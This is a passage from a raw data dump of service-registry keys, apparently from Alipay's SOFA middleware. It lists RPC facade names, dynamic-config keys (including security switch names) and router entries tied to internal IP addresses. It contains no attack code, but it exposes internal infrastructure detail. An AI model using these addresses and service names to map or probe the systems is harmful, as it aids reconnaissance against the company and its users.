D#@#SOFA","com.alipay.promocenter.biz.activity.service.UrlCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.risk.api.PluginProcessService:1.0:uctfront@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.StuffQrcodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:insmarketingbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.service.facade.api.IfxQuoteMonitorConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:publicDomain_agdscsalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseamng.rate.pms.PmsRatePromoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.scheduler.common.cluster.config.ClusterConfig.masterRefreshAssignRepeat,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.208.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.intimateprod.common.service.facade.spi.IntimateBenefitCallbackService:1.0:mwealthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fppolicy.service.configtable.ConfigTableQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectprod.core.service.integration.file.db.DBManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ISASP#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.MerchantBillService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:vouchercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.StuffApplyOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainprod.common.facade.api.account.OrgCertifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.geoip.GeoIpPublishService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","finriskmatrix@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_workflow_workflowMatterTemplateSelfService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.70.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.smartscene.common.facade.schedule.PlanScheduleTimeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarvis.service.facade.api.common.SendEmailManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:statusbar@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.done.common.service.facade.DoneResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.biz.service.impl.rpc.notice.LifeNoticeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@insusercenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.charge:name=com.alipay.zdal.ldc.tair.revtransTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.link.facade.AppraiseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.service.facade.api.ExFxRateStdProdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:ibillconfig@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumequery.common.service.facade.ConsumeRecordQueryRzoneServiceExt:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.base.member.relation.service.MemberRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:bkpaycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.allCouponFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settlecore.service.facade.SettleMessageSender:1.0:katong@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.155.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.custdecision.service.facade.XflushConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:meshysale@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.clearingcenter.common.service.facade.api.SettleInstructionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.185.251#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kgmng.common.service.facade.schema.SchemaPropertyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exriskcenter.common.service.facade.api.mng.FolderDefFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cxbiz.membersolution.common.service.facade.api.promotion.PromotionPlanManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbarcenter.common.service.facade.ar.v2.ArManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradecore:name=com.alipay.tradecore.service.zoneclient.impl.TradeCreateElasticDRM.partnerIdBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antlogmng.common.service.facade.tinyapp.TinyAppEventPublishService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_POINTPROD_CACHE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bksigncentre.common.service.facade.api.OrderOperateFacade:1.0:bksigncentre_orderOperateFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskConfigQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.ssrfPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.biz.alarmanalysis.activity.ActivitySendDingtalk:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivecenter.common.service.facade.api.ClcServerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.211.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zdataservice.common.service.facade.FinschedulerQueryService:1.0:zdataquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.0.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:tradefront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.LiquidateInstructionPreEnvDRM.targetCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.75.155#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.settlement.common.service.facade.api.UnholdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.core.service.schedule.ShuffleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.cachestorage.CacheStorageCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.common.sdk.open.service.edit.EdgeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.admin.service.GroupService:1.0:groupService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.MiniLoanConfigDrm.foreignerWhiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.accenter.service.query.api.AccenterTitleRuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.merchant.listener.UniformEventHandler:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_P_FAS_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.alm.service.facade.facade.AlmCommonProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtaskcenter.service.facade.FundFileCjbQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.accm.facade.AccmMailServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qianli.common.service.neardata.facade.QianliQueryConfigFacade:1.0:mobilerelation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsoc.service.facade.api.config.center.ResourceDeployQueryService:1.0:offline_stable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.common.service.facade.api.DataDecisionLDCService:1.0:myddscode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.biz.dapply.device.manager.ReassignReactManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbdesk.common.service.facade.api.KbDeskOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antopo.common.service.facade.biz.linkeflow.LinkeAppApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.132.151#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.159.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.revcore.common.service.finaccenter.facade.api.CoaRuleSubmitOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.user.api.SecuUserRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.counter.api.CounterFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:aixunTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:polaristwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dctlib.common.repository.mng.ConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insofflineinvest.common.service.facade.service.InvestDemandQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_MOBILPAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchmembercore.common.service.facade.relation.instance.RelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.userview.config.facade.UserLabelDRMControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payment.common.api.AssetConsultService:1.0:aeicoreBalanceAssetConsultService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.AdminForbiddenManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.treasurycenter.facade.api.fund.TreasuryAccountLogIdentifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.TempBatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.common.api.GeneralRPCManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordercore:name=com.alipay.ordercore.drop.level.openSalDetailLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.scheduler.common.service.facade.update.DispatchUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInMatchAllRequest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY@instpay#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.fininfo:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.quiz.api.QuizContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-gravitycdntwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zscale.api.ElasticCalcDecisionFacade:1.0:instscalecalc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.181.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.127.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:wealthbffweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaota.common.service.client.service.OtaDownService:1.0:mmtcaftscmdproc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.MessageSpi:1.0:mmtcaftscmdproc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.220#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.ak.project.openapi.ProjectApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.core.schduler.repository.SliceGzoneRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cryptprod.common.service.facade.crypto.MacFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:reconLoader@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.facade.api.RpcExternalReleaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.apacc.common.service.facade.module.StrategyConfigTongEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gateway.adapterservice.MobileAdapterService:1.0:mobile-wp-plugin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custcenter.service.antg.facade.digitalid.DigitalArchiveManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.CertBackupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.core.service.inspect.InspectDbService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.testCacheTbase.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csbizcenter.facade.admin.polymer.AppAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.clearing.ClearingTimeRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.SystemTaskManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficcardsp.common.service.facade.WeatherInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbclaimprod.common.manager.facade.ClaimExpressRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.189.0#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.yeb.YebVoucherService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_CIFPROCESS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkmerchantprod.common.service.facade.MerchResourceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.word.WordActivityUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.money.core.LmbMoneyFlowSyncNotificationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExClientAgrMappingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.common.service.facade.CqcBranchRuleQueryFacade:1.0:bkbbcmngService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofabootweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.ecdcc:name=com.alipay.common.webx.session.drm.SessionLogDrm.formtokenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fluxnet.common.service.oauth.facade.api.OAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dasbi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.device.admin.DeviceQueryAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.anteduprod.common.service.facade.api.certify.StudentCampusCertifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.ipay.imemberprod.service.facade.api.MemberCloseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.FintradeOrderLmyhRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.kbgate.api.test.TrServiceTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:iexratecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_MASTERDATA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.unitradeadapter.biz.shared.bankpay.PayChannelConfigRepository:1.0:gzonePayChannelConfigRepository@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoCallService:1.0:poscore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.rec.StrategyMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:imaspmng_projectCheckAuditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.eco.EcoDetectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.common.service.facade.MutexService:1.0:busYuebao@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.180.218#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.common.service.facade.app.PublicAppSecurityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgcore.common.service.facade.databus.DataQualityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finzyprod.facade.loan.api.ZyProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfrental@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.developerops.facade.api.OpsTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:prodtransquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.CollectionDecoratorAmountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ectradmng_lendpofprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frservcenter.facade.api.BuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mmportal:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsUpVIP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appstore.common.service.facade.hyp.MiniAppDataSyncForHYPFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.game.service.PcreditMarketGameFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:accorderexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.divide.LuckyCodeDivideQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepinfocenter.common.service.facade.api.feedback.EpFeedbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.giftprod.common.service.facade.ArDataServerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.ProfileConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.open.facade.admin.OpenAdminOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_FINPROMO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.aciamcore.common.service.facade.identity.OrganizationServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.giftprod.common.service.facade.GiftCrowdFlowQueryFacade:1.0:amyGiftFlowQuery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imif.opcenter.common.service.facade.crm.api.ProdSaleQueryCrmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.changerequirement.facade.spi.ChangeIterationCheckSpi:1.0:opscloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.MPcardManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:hybridinspect@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.SecureQuestionErrorTimesService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexclienttrdcenter.service.facade.gui.PaymentProviderGuiManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.distribute.SceneContentRelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ap.prodcenter.common.service.facade.query.api.contract.ArrangementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:minitoptrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.pkgCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.112.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.omoaidbase.biz.service.msgbroker.EventHandler:1.0:platformRevisitHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.220.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_certWhiteOperate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.habaseline.common.facade.service.monitor.MonitorInstanceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.3.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecashier.service.facade.spi.CashierActivityCallbackFacade:1.0:bizfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accustomercore.common.service.facade.UCKernelOperatorManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:developerforumadmin#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.argo.spi.publish.ArgoTrProxyFacade:1.0:amspm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scene.common.service.facade.logistic.LogisticsCompanyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:DASSET@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frastress.common.service.facade.api.RiskEventInputFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frastress.common.service.facade.kpi.KpiRecordDefFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmAsyncReplayManager.asyncReplayMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_K_CUSTOMER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.fc.comparacenter.common.service.facade.ComParaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.changeEventAnalysisSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.prodcore.service.api.rate.VerifyStandardRateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.basic.category.facade.BasicCategoryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FinInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.recruitcore.facade.api.enroll.EnrollAdminQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.modelcenter:name=com.alipay.modelcenter.core.runtime.drm.SimpleModelPubConfigResource.coreEngineP